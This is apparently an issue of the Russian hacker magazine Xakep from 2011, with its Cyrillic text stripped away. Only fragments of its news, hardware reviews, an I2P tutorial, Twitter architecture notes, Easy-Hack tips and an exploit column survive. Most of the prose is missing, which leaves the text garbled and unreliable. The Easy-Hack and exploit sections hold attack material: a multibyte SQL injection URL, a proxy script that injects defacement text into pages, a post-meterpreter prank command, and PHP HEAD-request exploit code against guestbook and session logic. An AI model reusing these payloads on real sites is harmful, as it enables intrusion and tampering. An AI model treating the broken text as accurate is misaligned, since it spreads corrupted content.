82
x 05 (148) 2011
.
210
:
PWN2OWN:
05 (148) 2011
VOIP
5 DVD
VOIP-
PHREAKING /
. 60
PHREAKING
. 130
148
Linux USB-
Red.Button:
Twitter
MS08- 067:
WINDOWS
. 68
. 82
.
210
:
PWN2OWN:
05 (148) 2011
VOIP
5 DVD
= 90
VOIP-
. 60
PHREAKING
. 130
Linux USB-
Red.Button:
Twitter
MS08- 067:
WINDOWS
. 68
INTRO
,
C :
1. Phreaking.
, kumekay
. ,
,
- DIY.
.
2. 90 . , , .
, .
:
? .
: www.xakep.ru/podpiska,
,
(540 , 1080 ).
. ,
,
.
3.
. , ,
,
, .
,
- . ,
Eset.
4. ,
- : 150- .
,
-, 27 , .
www.xakep.ru/150x.
nikitozz, . .
http://vkontakte.ru/xakep_mag
Content
MegaNews
004
Ferrum
016
PC_Zone
022
026
I2P
: Google Cloud
Microsoft Office
028
140
033
034
Twitter ?
TeamViewer
13
038
Microsoft
082
086
Easy-Hack
046
052
, ,
!
partypoker.com
058
client-side
060
VoIP!
064
2004 , ?
VoIP-
Red.Button
068
60
072
X-Tools
Windows
MALWARE
074
078
free- Avast, Avira, AVG, Comodo, ClamAV
SEO
BlackHat SEO
090
096
102
Windows
Linux
106
110
, Rogue AP,
042
Positive Technologies
iOS, Android, Bada, Symbian WM
Wi-Fi
Pwn2Own:
114
AirPlaySDK
memory leaks
SYN/ACK
118
122
127
SaaS
ERP -
-?
PHREAKING
130
134
Arduino
555
5 555
140
143
144
FAQ UNITED
FAQ
8.5
WWW2
web-
022
I2P
130
060
VoIP-
VoIP!
Phreaking
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
PHREAKING
kumekay
(po@kumekay.com)
>
> DVD
Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)
> xakep.ru
(xa@real.xakep.ru)
/ART
>
(olgaeml@glc.ru)
(alekhina@glc.ru)
>-
>
>
(polikarpova@glc.ru)
>
(maligina@glc.ru)
/PUBLISHING
>
( )
(strekneva@glc.ru)
>
>
> -
(alekseeva@glc.ru)
> MAN TV
>
, 115280, , . ,19, , 5 , 21
.: (495) 935-7034, : (495) 545-0906
>
>
>.
>
>
>
>
>
>
> TECHNOLOGY
(komleva@glc.ru)
>
>
>
(kosheleva@glc.ru)
>
>
> :
-
DVD-: claim@glc.ru.
>
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
>
101000, , , / 652,
,
77-11802 14.02.2002
Zapolex,
.
190 874 .
.
. ,
,
.
.
.
:
content@glc.ru
, , 2011
MEGANEWS
Mifrill (mifrill@real.xakep.ru)
Meganews
SCADA-
,
Stuxnex, , ,
. ,
, Stuxnet, - . Stuxnet (
Symantec) ,
, ,
. , ,
. , Ottawa Sun,
,
. 2011
, SCADA-. , SCADA
Supervisory Control And Data Acquisition, : .
, , , . - Agora SCADA+
Gleg,
DDoS-.
0day-. -
. ,
: Siemens Tecnomatix
FactoryLink, Iconics GENESIS, 7-Technologies IGSS DATAC RealWin.
Gleg, ,
, , SCADA-
, . ,
. ,
, . Proof-of-concept
seclists.org/bugtraq/2011/Mar/187.
! ICANN
.xxx . ,
$60. 200 000 .
, .
NEC. ,
HS100-10, .
IT ,
. :
, ,
- , , . ,
. NEC .
HS100-10 , ,
. ,
.
,
. HS100-10 USB .
, , ,
.
004
X 05 /148/ 2011
MEGANEWS
SONY
Sony vs
GeoHot, . ,
graf_chokolo,
PlayStation
3 . Sony
(
), ,
, ,
, PS3.
, ,
HV Bible.
, ,
. Sony
,
,
graf_chokolo :
, .
, , ,
Sony. , .
, .
Sony. ,
(
16-20 000). ,
(grafchokolo.com).
3.60, ,
. ,
Winocm,
YouTube,
.
, Winocm Sony,
.
, MySpace , .
comScore ,
: 73 63 000 000.
RUSTOCK ,
,
. :
Microsoft
, 2006 Rustock.
.
,
192 - .
150 000 2 400 000. ,
, , Rustock - . b107.
Microsoft Digital Crimes Unit
,
, , Rustock. Microsoft,
Microsoft ,
, ,
. -, . :
33.6%. -,
- ,
, , Rustock 13 820 000 000
. , . Bagle
Festi, .
8 310 000 000 4 200 000 000
006
, . Bagle, ,
22%
.
, .
, .
X 05 /148/ 2011
MEGANEWS
,
. , -
,
, .
WirelessHD, WHDi, Intel WiDi .
, ,
,
. Fujitsu
CeBIT SUPA (Smart
Universal Power Access).
. . Fujitsu
22- , -:
.
.
(
25 ),
. CeBIT
,
. ,
, USB ,
.
Fujitsu .
, ? :)
Samsung,
CeBIT -
. VA- 46
1920 x 1080 -
.
.
. ,
Samsung
.
!
Windows 7 Windows Server
2008 R2.
,
SYN/ACK UNIXOID. ,
,
,
, ,
Windows UNIX, , .
Active Directory
,
Windows. Windows 7 Windows Server 2008 R2 100%
,
, ,
IT-.
GH0STMARKET.NET
Gh0stMarket.net. .
, ,
,
, .
, . , GhostMarket
008
,
, - .
,
8 000 .
GhostMarket 65 000 ,
$25 000 000.
. ,
.
. : 19- , 18- 21- . , .
, ,
. ,
, .
,
, .
.
, , ,
.
X 05 /148/ 2011
MEGANEWS
LTE-
- ,
LTE-
. (Yota),
-
,
(, , , ) .
:
180 (
$2 000 000 000),
LTE-
. 2014
.
,
, , ,
. , ,
. ,
30-40 ( ) 2.5-2.7. , ,
, , Yota
, , ,
.
--
,
,
Facebook. - Color - App Store
Android Market,
.
. ,
, , (
Color).
,
.
,
Sequoia Capital, Bain Capital
Silicon Valley Bank Color
$41 000 000. ,
.
, .
010
X 05 /148/ 2011
SSL-
SSL, Comodo
- (mail.google.com, google.com, login.yahoo.
com, login.skype.com, addons.mozilla.org, login.live.com). 15-
CEO ,
, ,
, ,
. ,
IP,
, SSL-.
SSL- Google, Skype, Microsoft, Mozilla Yahoo. -
, , login.skype.
com, ,
. , pastebin.com/74KXCaEZ
-,
. , Janam Fadaye
Rahbar (
), ,
, 21-
, .
, ,
. ,
Comodo InstantSSL.it. ,
TrustDll.dll, C#.
,
API Comodo, , . ,
,
. . , (, TrustDLL),
, Mozilla addons.
,
, .
MEGANEWS
QIWI
, , ( )
.
Trojan.PWS.OSMP. ,
Qiwi.
Windows :
maratl.exe, ,
,
. .
USB-, ( ).
(
, -, Delphi) BackDoor.
Pushnik,
. ,
,
( ),
Trojan.PWS.OSMP .
Qiwi ,
, Dr.Web
,
.
, ,
,
.
EDIFIER
Edifier
.
Edifier :
.
, Edifier
. ,
S330D,
S330,
.
2.1 ,
,
. Edifier , S330D
. , S330D
.
.
AUX-,
.
72 .
20 20 000 .
S330D
, (Xbox, Sony PlayStation)
. , Edifier
S530D S730D, .
ZEUS
ZeuS,
. ,
malware ZeuS SpyEye.
. , SpyEye,
, ZeuS,
. ,
, .
: .
,
.
,
, ,
. :
ZeuS,
, ,
, . , :
.
,
.
IOO Jabber
ICQ
, .
: ,
ZeuS
, .
X 05 /148/ 2011
-
,
.
.
- ,
, ,
Allofmp3 Rutracker.
, , (
,
)
-.
:
.
, , , .
.
X 05 /148/ 2011
013
MEGANEWS
TFT-
Wexler WEXLER.BOOK T7002.
, 7.0 TFT- LED .
,
. (
),
. ,
, E-ink,
. Wexler, ,
.
(ansi, txt, pdf, html,
fb2, pdb, epub), /
(mp3, wma, flac, AAC), (wmv, rm, avi,
rmvb, 3gp, flv, mp4, mpeg, mkv) (jpeg, bmp, gif). ,
:). , ,
LCD-
. TFT- WEXLER.BOOK
T7002 .
7 ,
5 , ( )
30 .
4 ,
200 000 .
20
MicroSD.
mini-USB , . WEXLER.
BOOK T7002
.
: , , , , , .
. , , :
4 599 .
NOKIA X1-00: 61
Nokia.
. X1-00
Series 30
,
,
. Nokia
,
1320 61 (!) . , ,
,
?
mp3-.
,
, FM-,
014
microSD ( 16
).
.
,
, ,
,
. , X1-00
35. Nokia
,
,
(
).
.
,
-.
X 05 /148/ 2011
X 05 /148/ 2011
FERRUM
:
: Intel Core 2 Duo E4700, 3500
: ASUS P5QC
: 2x1024 , Kingston
DDR2, 800
: NVIDIA GeForce 9800 GT
: 430 , Thermaltake
: Microsoft Windows 7
Ultimate x32
1
,
,
. , , .
-
. .
99%
,
. , ,
( ,
) , .
, , , ,
! ,
MTBF, , .
. , ,
SATA
3.0, ,
, . ,
HDD ( )
SATA III,
. ,
. 7200 ,
5400
, . , ,
,
016
, ,
. .
, -,
.
32 (16 ),
64 . ,
RAID-,
,
RAID-, .
, . , - ,
, , .
. , AIDA64
( Lavalys Everest),
.
. , HD Tune
Pro , .
X 05 /148/ 2011
4000 .
3400 .
Hitachi Deskstar
7K2000
HDS722020ALA330
Hitachi Ultrastar
A7K2000
HUA722010CLA330
: 2
: SATA II
: 32
: 7 200 /
: 29
: 0.74
: 1
: SATA II
: 32
: 7 200 /
: 24
: 0.68
, :
. ,
( ), -
.
X 05 /148/ 2011
,
, , Ultrastar A7K2000
. , ,
. , ,
.
017
FERRUM
3000 .
3200 .
SAMSUNG
HD204UI
Seagate Barracuda
Green ST31500541AS
: 2
: SATA II
: 32
: 5 400 /
: 29
: 0.65
: 1.5
: SATA II
: 32
: 5 900 /
: 26
: 0.655
, Samsung
5 400 , ,
, .
,
/.
, 32 ,
. ,
, ,
.
, ,
. Seagate Barracuda
Green ST31500541AS Samsung HD204UI. ,
. ,
. , ( )
. ,
.
,
.
. , ,
.
018
X 05 /148/ 2011
8400 .
5400 .
Western Digital
Caviar Green
WD30EZRS
Western Digital
Caviar Black
WD2001FASS
: 3
: SATA 3.0
: 64
: 5400-7200 /
: 25
: 0.73
: 2
: SATA II
: 64
: 7 200 /
: 30
: 0.75
: 3
SATA 3.0. RAID- ,
.
WD Green ,
. , ,
64 .
, , . ,
? . Western Digital Caviar Black :
. ,
-,
, .
, :
,
. : , ,
RAID-. ,
,
.
X 05 /148/ 2011
, (, , ,
): .
019
FERRUM
HD Tune Pro Access time read/write,
20
40
60
80
100
120
Write
Read
10
15
20
, . ,
020
. Samsung
HD204UI, , Western Digital Caviar
Black WD2001FASS, .
, , , HDD. z
X 05 /148/ 2011
PC_ZONE
I2P
.
, . , ,
,
, I2P.
I2P vs Tor
, I2P?
, IP . I2P
pear-to-pear ,
. I2P , . .
Tor. , , I2P,
.
, I2P Tor, -
022
,
. ,
. Tor
, I2P
, .
- ( ,
,
), .
-,
I2P eepsites. -
Hidden Services, X 05 /148/ 2011
( HTTP). I2P
Base 32 Names
.onion Tor.
516- ( )
raw-. SHA256 Base32.
.b32.i2p.
? .
www.
i2p2.i2p, :
I2P
Tor, I2P . ,
, .
I2P DNS-, - DHT (Distributed Hash Table),
Kademlia. .
, 2007 Tor. , I2P , . ,
I2P
, NetDB.
, , , ,
-
.
I2P
IP,
,
, . , www.i2p2.i2p (
I2P) :
-KR6qyfPWXoN~F3UzzYSMIsaRy4udcRkHu2Dx9syXSz
[... ...]
e9NYkIqvrKvUAt1i55we0Nkt6xlEdhBqg6xXOyIAAAA
,
516 Base64. , .
X 05 /148/ 2011
rjxwbsw4zjhv4zsplma6jmf5nr24e4ymvvbycd3swgiinb
vg7oga.b32.i2p
. I2P
- DNS-,
( <somename>.
i2p ), . I2P
, .
HOSTS.
,
I2P.
, ,
.
I2P . Tor
, I2P
(in) (out) . ,
.
(, ),
.
,
.
I2P (Garlic routing). , ,
( )
.
, -
DVD
dvd
,
,
.
INFO
info
I2P- ?
: https://
www.awxcnx.de/
cgi-bin/proxy2/nphproxy.cgi/000000A/
http/< >
023
PC_ZONE
P2P- I2P
, .
, ,
, .
.
, I2P. :
IRC, BitTorrent, eDonkey, Email.
I2P API
, ,
I2P-.
,
. I2P Java,
Java-.
, .
.
-, 127.0.0.1:7657/index.jsp. .
I2P
( ), HTTP-: 127.0.0.1:4444. . .
, I2P ,
. , I2P, eepsite. ,
,
I2P
. ( ,
) IP-
. step-by-step
I2P.
1. 127.0.0.1:7658,
-. eepsite,
. , ~/.i2p/eepsite/docroot/ (Linux) %APPDATA%\I2P\
eepsite\docroot\ (Windows). Jetty, I2P:
7658 . , .
, I2P .
2. , .
(127.0.0.1:7657/i2ptunnel),
I2P- I2P
024
webserver , . . . ,
, (local
destination) , -
F94tTd-vSO7C0v~4wudVsaYV[.. ...]AAAA.
Base64 ,
I2P-. - IP-.
-
.
Base32- ( ) Python- ( ).
,
zeky7b4hp3hscdwovgb2vtdbv
ltsvpf24ushype5uoigu42p3v5q.b32.i2p.
, , . ,
, .
3. DNS I2P , . eepsite
(something.i2p). ,
- , :
127.0.0.1:7657/susidns/addressbook.jsp?book=router&filter=none.
,
mysite.i2p
(, xa31337xa.i2p).
,
I2P.
4. ! .
eepsite . , , ,
. ,
eepsite. !
- Base32, .
I2P, - . ,
: 127.0.0.1:4444. ,
, .
( outproxy). , , -
. , I2P .
,
VPN/Tor/SSH-. I2P , , .
X 05 /148/ 2011
Base64 Base32
I2P
DNS
5. , .
, -
127.0.0.1:7657/susidns/addressbook.jsp?book=master.
,
, , .
6. eepsite stats.i2p.
, . (516 Base64).
Submit. ? ,
. (
) xa31337xa.i2p.
, DNS-. , ,
Base32- : stats.i2p/cgi-bin/jump.cgi?a=xa31337xa.i2p.
- ,
wiki ugha.i2p/eepsiteIndex
forum.i2p.
7. , ,
.
. , ,
: .
127.0.0.1:80, , ,
92.241.175.142:80 ( ip- xakep.ru).
SSH-
- I2P
.
SSH-,
, eepsite. .
1. , I2P
. SSH-.
, -
: , (
X 05 /148/ 2011
inproxy.tino.i2p/status.php
eepsite,
;
tracker2.postman.i2p exotrack.i2p BitTorrent;
hashparty.i2p (LM, MD5, MYSQLSHA1, NTLM, SHA1 );
redzara.i2p dumpteam.i2p
192.168.1.1:22).
, .
(Base32)
.
2. , , ,
SSH- (, PuTTY). . I2P .
SOCKS, , ,
. , , , I2P,
,
I2P- SOCKS 4/4a/5. , , ( 5454).
3. , . PuTTY, , . Connection Proxy
Proxy proxyname ,
SOCKS- 127.0.0.1:5454. DNS name
lookup Yes Auto.
4. . , I2P SSH.
, -, .
:
I2P 100% eepsite?.
: . , ,
, I2P.
-. ,
IP- .
. ,
Irongeek (irongeek.com)
,
BlackHat 2011 DC. z
025
PC_ZONE
Step (twitter.com/stepah)
:
GOOGLE CLOUD
MICROSOFT OFFICE
:
Microsoft Office - Google Docs.
.
,
.
!
,
Microsoft Office.
026
Cloud Connect
OpenOffice, -
Microsoft. ,
-.
Google Docs. ][
, .
,
,
. EtherPad
Docs . ,
, .
,
. .
Google Docs ,
, ,
. ,
Office .
, ,
? .
, Office
,
Google Docs. , , .
OffiSync (www.offisync.com). Microsoft Word, PowerPoint Excel
,
Google. ?
,
. Google Docs , .
, ,
( ) .
, OffiSync
Google Docs ( ).
X 05 /148/ 2011
, ,
, , . , -
, OffiSync
(merge). , .
:
Google? , :).
DocVerse,
Office
2007, Google Docs.
- Microsoft $25 000 000. , Google Cloud Connect
for Microsoft Office (tools.google.com/dlpage/cloudconnect)
. OffiSync, ,
. ,
Microsoft Word, PowerPoint
Excel, . Cloud Connect ,
. : ,
.
, , .
: - , .
, Microsoft
SkyDrive (skydrive.
live.com) - Office Web
Apps (office.microsoft.com/ru-ru/web-app). ,
Microsoft Office. ,
Windows Live Mesh. z
027
PC_ZONE
(insight-i t.ru)
140
Twitter ?
, ,
, . 5 .
? 140 @ #. Twitter-
( follower).
, -,
175 000 000 .
Twitter Odeo,
.
. , ,
?. 140 000 000
028
Twitter .
.
Twitter
- , - (
, ). ,
25% -, API.
: , , 182%.
: 6 000 000 000 API ,
70 000 !
HTTP, .
X 05 /148/ 2011
Web
Load Balancers
API
Apache mod_proxy
HTTP://WWW
25%
Rails (Unicorn)
MySQL
links
Cassandra
75%
Flock
memcached
Kestrel
Twitter
-
: insightit.ru/highload
Daemons
- API
Ruby on Rails,
Ruby Scala. , Ruby
on Rails ,
Twitter ,
10-20% ,
RoR
.
, ,
. , NTT America,
.
:
,
.
Apache
httpd, ,
Ruby.
Unicorn,
, ,
( 30% )
.
Apache + Unicorn . :
( ), ActiveRecord, SQL- Ruby, ,
,
.
.
, ,
. Twitter, memcached,
Segmentation Fault ( ). ,
TTL ( ), .
. . Twitter memcached
Ruby libmemcached FNV Ruby md5.
,
. , .
, - ( , :
).
memcached,
.
, ,
X 05 /148/ 2011
Twitter
,
. . MySQL.
,
.
: ,
, .
.
FlockDB , MySQL.
Gizzard.
,
. .
Twitter 13 000 000 000 ,
20 000 100 000 -
3 , 2 1 Twitter,
.
.
460 000 .
6 939 TPS (
), 4
.
029
PC_ZONE
Flock
Flock
Gizzard
MySQL
Gizzard
100 000
Mysql
Mysql
Mysql
Flock
.
FlockDB :
: 1
: 2
: 1 , 16
: 100 /
Twitter :
15-25 , 12 .
. ,
80
, 12 48 .
.
.
Java-
Apache Hadoop ,
,
. Hadoop
. ,
030
MapReduce. ,
,
. HDFS
(Hadoop Distributed File System),
,
. .
Hadoop
Google File System (GFS).
, HDFS ,
MapReduce ,
- Java. ,
Hadoop Twitter:
, ( ,
5 12 000 000 000 ),
PageRank .
MapReduce,
Java, .
Twitter OAuth
X 05 /148/ 2011
Twitter
- , opensource
.
:
- .
- ,
, ,
opensource. Cassandra Scribe, ,
Facebook,
Twitter.
Twitter
, , ,
:
Loony , Python, Django, MySQL
Paraminko ( SSH Python).
LDAP, .
Murder ,
BitTorrent. P2P-
30-60 .
Kestrel , Scala
memcache. ,
: set ( ) get (
).
.
, . , Twitter
Pig, , Hadoop.
,
.
X 05 /148/ 2011
031
PC_ZONE
SQL, , 20
,
MapReduce-.
Twitter Pig. Hadoop Twitter ,
. opensource HBase,
Google BigTable. , HDFS,
.
, ,
, ,
-
, .
,
, .
syslog-ng, . : Facebook,
, Scribe,
opensource Twitter.
.
. Scribe
.
, ,
.
, HDFS (
).
Twitter , 30 .
Facebook, .
. Twitter ,
-:
032
;
;
.
,
,
.
( ), ,
. , . , :
?
.
:
, ,
.
Twitter , . ?
Rails (HTTP 500), ,
. ? HTTP- 502
503, 5 ( - ,
),
(mkill).
.
bash-, 60 ,
/ , .
Twitter
,
- .
- - .
,
. ,
:).
Twitter
?
1. ,
.
2.
.
3. , . , ,
-
, .
4. memcached
.
5.
,
.
6. .
Twitter . , API . ,
. ,
. -, ,
.
, . z
X 05 /148/ 2011
PC_ZONE
Step twitter.com/stepah
(twitter.com/stepah)
TeamViewer
TeamViewer.
,
, NAT.
IP
, RDP
VNC . -
TeamViewer
: NAT, .
.
.
, IP-,
, ,
, .
TeamViewer -.
.
.
.
,
.
, ,
TeamViewer.
KeepAlive. TeamViewer
,
.
,
100 000 000
.
!
QuickSupport
.
- ,
.
.
. ,
,
.
. ?.
. ,
X 05 /148/ 2011
,
-.
.
,
MacBook.
,
Windows, Mac OS X
Linux. -
: PRM,
deb, tar.gz. , () TeamViewer
,
. ,
.
.
.
.
Android iOS (
iPhone iPad).
,
( ,
),
.
3G
, . - ActiveX Java.
, TeamViewer
, -
( , , ,
). TeamViewer
Web Connector login.
teamviewer.com.
HTML/Flash ActiveX
Java,
. . TeamViewer?
,
NAT. : TeamViewer
Windows, Linux, Mac.
.
.
.
!
, ,
-
(xakep.ru/magazine/xa/116/032/1.asp) z
ID TeamViewer
033
PC_ZONE
Step (twitter.com/stepah)
13
Microsoft
? , , , . Microsoft
,
, .
Microsoft ,
. .
, 40 (!) . Microsoft , 2004
SDL (Security Development Lifecycle).
, SDL , , . SDL, Microsoft
, .
, ,
.
SDL
.
Microsoft . ,
034
,
. , ,
. ,
, .
,
.
/
BinScope Binary Analyzer
DEP ASLR.
,
.
, SDL,
:
DEP, ASLR.
/NXCOMPAT /DYNAMICBASE. , Binscope SDL X 05 /148/ 2011
,
SDL. ,
SDL
/,
.
Binscope
, ( , ).
AppVerifier
Application Verifier , native ,
.
,
( runtime). AppVerif , ,
. ,
API, .
40
FxCop
.
, .NET
.NET
Framework. , ,
. FxCop
CIL ( ,
Microsoft .NET) .
INFO
info
Secure
Lifecycle Development:
microsoft.com/
security/sdl.
035
PC_ZONE
banned.h
C/C++,
, buffer
overflow .
: (xstrcpy(), strcat(),
gets(), sprintf(), printf(), snprintf(), syslog()), (access(), chown(), chgrp(), chmod(), tmpfile(), tmpnam(),
tempnam(), mktemp()),
(exec(), system(), popen()). ( )
. ,
, ,
(, ,
SDL).
SDL, ( ) ,
. Minifuzz File Fuzzer
, ,
.
,
.
036
PC_ZONE
Step (twitter.com/stepah)
, Rogue AP,
Wi-Fi
. -
3G- WiMax- .
- (Rogue AP) , , . ,
!
3G-
.
USB-, -
038
. , ,
.
X 05 /148/ 2011
netsh
,
3G-, , Wi-Fi
.
,
,
Windows-.
Windows
7 Windows 2008 Server R2.
.
, Wireless Hosted Network (
). , , ,
.
4
1. .
, .
,
USB 3G-
. , MAC,
.
2.
.
,
. ,
Wi-Fi (
Connectify Clone Wi-Fi Settings).
.
HTTP://WWW
links
Wireless Hosted
Network:
http://goo.gl/3p7Gq;
MSDN:
http://goo.gl/6qp2y;
,
:
http://goo.gl/yfYuf.
3. Rogue AP .
,
.
Wireshark, 0x4553Intercepter Network Miner .
USB- ,
( ,
) .
4. .
,
VPN-.
- OpenVPN Tor.
,
.
, .
039
PC_ZONE
,
),
3G-, WiMax- ethernet-.
Wireless Hosted Network . , (, ,
)
Wireless Hosted Network,
-. ,
, Windows 7.
,
.
, ,
, - , ,
Wireless Hosted Network. . Microsoft, ,
,
: ,
API- (
MSDN),
netsh (network shell). Netsh.exe
, .
.
, netsh
wlan /?. , .
, :
#
netsh wlan start|stop hostednetwork
#
netsh wlan set hostednetwork [mode=]allow|disallow
# , SSID,
# , (/)
netsh wlan set hostednetwowrk [ssid=]<ssid>
[key=]<passphrase> [keyUsage=]persistent|temporary
#
netsh wlan refresh hostednetwork [data=] key
# ,
# ( )
netsh wlan show hostednetwork [[setting=]security]
#
netsh wlan show settings
, : ,
Wireless Hosted Network,
,
Virtual WiFi. : Asus
Intel 3945ABG WLAN-
.
,
. .
1.
040
netsh.exe :
netsh wlan set hostednetwork mode=allow ssid="Virtual
Hostpot" key="pass pass pass" keyUsage=persistent
3. , , .
- , -.
,
, ,
.
,
, , Wireless Hosted Network
.
Internet Connection Sharing (ICS).
IP- ( DHCP-),
NAT (Network address
translation).
, !
, ,
.
: ( )
. . ,
, MSDN Wireless
Hosted Network
.
: Virtual Router (virtualrouter.codeplex.com)
Connectify (connectify.me).
GUI- ,
,
.
SSID :
. Virtual Router ,
(
X 05 /148/ 2011
Virtual Router
Ubuntu
Linux, Windows, . ,
, : wireless.kernel.org.
, .
Ad-Hoc Mode Working . ,
wiki:
help.ubuntu.ru/wiki/wifi_ap.
Mac OX X
Mac OS X
Infrastructure, , .
,
MacBook
, .
: bit.ly/macbook_hotspot.
onnectify
API- ).
, netsh.
Connectify .
X 05 /148/ 2011
,
,
. .
, Wireless
Hosted Network WPA2-PSK/AES:
, .
, (, ).
, Connectify UPnP-
VPN- ( OpenVPN). -
. , ,
. . z
041
GreenDog , DSecRG.ru, Digital Security (agrrrdog@gmail.com)
Easy Hack
1
:
NOTEPAD++.
:
:).
, - .
/ ,
. nix ,
. , *nix grep gawk (gnu.org/software),
.
Notepad++. , .
, , Cain ,
/.
Notepad++: / , .
, regexp :
1)^.*:\s
2)\r\n :
3) :--------------------- \r\n
, Notepad++ regexp
, .
. (
),
, .
- .
Cain .
<Home>, <End>.
shortcuts.xml. Notepad++, %APPDATA%
. .
, , : notepad-plus-plus.ru/uploads/cod.zip.
:
, PROCESS
MONITOR.
:
Sysinternal, . (sysinternals.com) .
:
( :) ).
,
- , Process Monitor
(procmon.exe).
. ,
, ,
. , Notepad++ , shortcuts.xml.
:
1.
2.
3.
4.
/ , ,
(, ),
. Tools File Summary, (. ).
, . !
, .
- .
. shortcuts.xml
Notepad++ Procmon.
Procmon: Process name is notepad++.exe
Notepad++.
.
042
X 05 /148/ 2011
:
-.
:
, , FireFox
. .
,
FoxyProxy. FoxyProxy
-. , , -
, . ,
.
, , ,
, . , :).
, .
.
:
HTTP(S)- WEBSCRAB.
if (bytes != null) {
String content = new String(bytes);
content="<h1>Hacked by GreenDog<h1>"+content;
response.setContent(content.getBytes());
}
:
, , -
(Base64) http,
.
webscrab.
- , . Webscrab -
/,
. OWASP (owasp.org/index.php/
Category:OWASP_WebScarab_Project). webscrab
. .
webscrab Kuzya forum.antichat.ru/showthread.
php?t=106452.
.
webscrab (127.0.0.1:8008, ),
, webscrab
, , realm (
) Tools Credentials. !
- ,
webscrab http/.
.
Tools User full-featured
interface, Proxy Bean Shell. Enabled. Commit.
, Bean. Bean Shell
Java. ,
. beanshell.org/manual/
bshmanual.html.
:
return response;
}
.
, 1 URL testphp.
vulnweb.com www.ya.ru (
Acuntix :) ).
URL URL
.
2 ,
( ), .
3 ,
, , ,
. . .
,
- . / :
owasp.org/index.php/How_to_modify_proxied_conversations.
bean shell.
-webscrab (Tools
Proxies). -webscrab, bean shell <> webscrab
<> .
yandex? :)
043
: :).
:
, ,
. .
:). , -, ,
- . , - YEHG GoogleHacker (yehg.net/lab/
pr0js/files.php/googlehacker.zip).
. , ,
html , .
.
:
, , SQL-
. OWASPa.
][ , (
).
PHP MySQL
web-. , PHP
MySQL.
- , SQL- .
- . mysql_real_
escape_string ( real), addslashes. ,
, , .
: addslashes (
/) (0x27)
(0x22) , (0x5c) null- (0x00). , .
.
?
SJIS, BIG5, GBK, CP932.
, UTF. -
:
WINDOWS-.
:
win-, .
, ( cmd.exe)
: , nix.
. - ,
doskey. alias . Doskey
/
, .
Windows.
044
, ,
:)
MySQL 4.1.-4.1.20, 5.0.x-5.0.22 PHP < 5.2.5
, ,
, .
, . GBK,
, 0xbf27 ,
. 0xbf5c . addslashes:
, . 0xbf , 0x27
, .
0xbf5c27 (\'), MySQL
0xbf5c 027, - .
SQL- :
http://test.com/Vuln.php?id=%bf%27 OR 1=1 /*
, mysql_escape_string
,
. :
shiflett.org/blog/2006/jan/addslashes-versus-mysql-realescape-string;
ilia.ws/archives/103-mysql_real_escape_string-versusPrepared-Statements.html;
kuza55.blogspot.com/2007/06/mysql-injection-encodingattacks.html;
raz0r.name/vulnerabilities/sql-inekcii-svyazannye-smultibajtovymi-kodirovkami-i-addslashes.
, :
windowsfaq.ru/content/view/203/1,
Microsoft.
1. Doskey /history
2. Doskey ls=dir $*
3. Doskey /exename=ftp.exe go=open 192.168.2.101$tmget *.TXT
c:\reports$bye
:
1. .
2. dir
( $*).
3. ftp.exe. , go
ftp, 192.168.2.101,
. $t (open, mget, bye). ,
X 05 /148/ 2011
,
cmd.exe.
1. :
doskey /macros > stdmacs
"C:\Windows\system32\cmd.exe" 1
nircmd.exe win trans title \
"C:\Windows\system32\cmd.exe" 100
4.
:
2. :
doskey /macrofile=stdmacs
, . : F7/F9,
.
. -
Nirsoft. , , , -
:). Nirsoft nircmdc.
: nirsoft.net/utils/nircmd.html. , (
) .
, 34
, , ,
, , . , , ,
.
- meterpreter, , .
,
. ,
(. ).
1. :
, , .
nircmd.exe
2. (. ):
nircmdc.exe trayballoon "Yo man!" "You are powned!" \
"shell32.dll,-15" 10000
3. :
nircmd.exe win settopmost title \
nircmd
: MSCASH-
MSCache2 , Vista:
hash = PBKDF2_SHA( MD4 (MD4(user password) +
lowercase(username)), iterations )
:
, , , ,
. windows-
10 ,
10 .
. ,
,
, . , .
,
. , NTLM-,
SAM LSA, MSCache-.
MSCache. .
Windows 2000-2003:
hash = MD4 ( MD4(user password) + lowercase(user name) )
X 05 /148/ 2011
iterations 10240.
: passcape.com/index.php?se
ction=docsys&cmd=details&id=8.
MSCache, MSCache2 , , , john the ripper jumbo-.
, , .
. ,
, fgdump. ,
, .
, , . .
meterpreter. ,
mediaservice.net .
: lab.mediaservice.net/code/cachedump.rb. z
045
(icq 884888, snipper.ru)
. , advisory ,
PoC-.
,
.
01
PHP
HTTP HEAD-
BRIEF
3
PHP,
HEAD-. HTTP HEAD
method trick in php scripts.
PHP-, ,
,
- ( ). ,
GET, POST, PUT.
, HTTP-
, HEAD. - PHP
.
: ./main/SAPI.c, 315:
if (SG(request_info).request_method &&
!strcmp(SG(request_info).request_method, "HEAD"))
{
SG(request_info).headers_only = 1;
...
- , php_ub_
body_write.
main/output.c, 699:
zend_bailout();
}
,
HEAD zend_bailout .
EXPLOIT
.
, , -
:
<?php
$line='Nick: '.htmlspecialchars
($_POST['nick']).'<br />
Text: '.htmlspecialchars
($_POST['text']).'<hr />';
$f=fopen("book.txt","r");
$data=fread($f,filesize("book.txt"));
fclose($f);
$f=fopen("book.txt","w");
$data=$line.$data;
echo $data;
fwrite($f,$data);
fclose($f);
?>
HEAD:
if (SG(request_info).headers_only) {
if(SG(headers_sent))
{
return 0;
}
php_header(TSRMLS_C);
046
<?php
stream_context_get_default
(array('http'=>array('method'=>"HEAD")));
print_r(get_headers('http://site.com/guestbook.php'));
?>
X 05 /148/ 2011
HEAD-
,
echo $data;, book.txt
- .
.
:
<?php
session_start();
echo 'A long string contains about 4090 characters';
$_SESSION['admin']=1;
if (!isset($_POST['pass']) ||
$_POST['pass']!='somepassword')
{
echo '<b>Wrong or empty password.</b><br>';
$_SESSION['admin_level']=0;
}
advisory HEAD-
PHP
?>
. , ,
.
HEAD, echo,
, . ,
-
4096 ,
'A long string contains about 4090 characters'.
EXPLOIT
PHP <= 5.3.5
SOLUTION
PHP
5.3.5. , ,
HEAD.
02
CAKEPHP
BRIEF
CakePHP ( 7 000 000
) -, PHP .
CakePHP -- (MVC).
X 05 /148/ 2011
Ruby on Rails,
:
;
;
(PEAR::DB, ADOdb
Cake);
